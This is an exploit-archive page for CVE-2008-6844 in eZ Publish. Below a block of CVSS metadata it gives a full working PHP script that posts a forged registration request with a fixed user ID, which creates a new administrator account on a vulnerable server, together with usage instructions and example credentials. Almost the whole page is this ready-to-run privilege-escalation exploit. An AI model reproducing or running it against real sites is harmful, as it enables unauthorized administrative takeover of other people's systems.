eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit

2009-07-03 / 2012-01-30
Credit: s4avrd0w
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-6844
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /* eZ Publish privilege escalation exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected >= 3.5.6 Resolved in 3.9.5, 3.10.1, 4.0.1 More info: http://ez.no/developer/security/security_advisories/ez_publish_3_9/ezsa_2008_003_insufficient_form_handling_made_privilege_escalation_possible * tested on version 3.9.0 usage: # ./eZPublish_privilege_escalation_exploit.php -u=username -p=password -e=email -s=EZPublish_server The options are required: -u Login of the new admin on eZ Publish -p Password of the new admin on eZ Publish -e Email where to go the letter for activation new admin account -s Target for privilege escalation example: # ./eZPublish_privilege_escalation_exploit.php -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ [+] Exploit successfully sending [+] Activate your new account and be registered in system using toor/P@ssw0rd */ function help_argc($script_name) { print " usage: # ./".$script_name." -u=username -p=password -e=email -s=EZPublish_server The options are required: -u Login of the new admin on eZ Publish -p Password of the new admin on eZ Publish -e Email where to go the letter for activation new admin account -s Target for privilege escalation example: # ./".$script_name." -u=toor -p=P@ssw0rd -e=toor@mail.ru -s=http://127.0.0.1/ [+] Exploit successfully sending [+] Activate your new account and be registered in system using toor/P@ssw0rd "; } function successfully($login,$password) { print " [+] Exploit successfully sending [+] Activate your new account and be registered in system using $login/$password "; } if ($argc != 5 || in_array($argv[1], array('--help', '-help', '-h', '-?'))) { help_argc($argv[0]); exit(0); } else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg,1,1); if (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); } } if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) { $post_fields = array( 'ContentObjectAttribute_data_user_login_30' => $ARG[u], 'ContentObjectAttribute_data_user_password_30' => $ARG[p], 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], 'ContentObjectAttribute_data_user_email_30' => $ARG[e], 'UserID' => '14', 'PublishButton' => '1' ); $headers = array( 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s] ); $res_http = new HttpRequest($ARG[s]."/user/register", HttpRequest::METH_POST); $res_http->addPostFields($post_fields); $res_http->addHeaders($headers); try { $response = $res_http->send()->getBody(); if (eregi("success", $response)) { successfully($ARG[u],$ARG[p]); } else { print "[-] Exploit failed"; } } catch (HttpException $exception) { print "[-] Not connected"; exit(0); } } else { help_argc($argv[0]); exit(0); } } ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top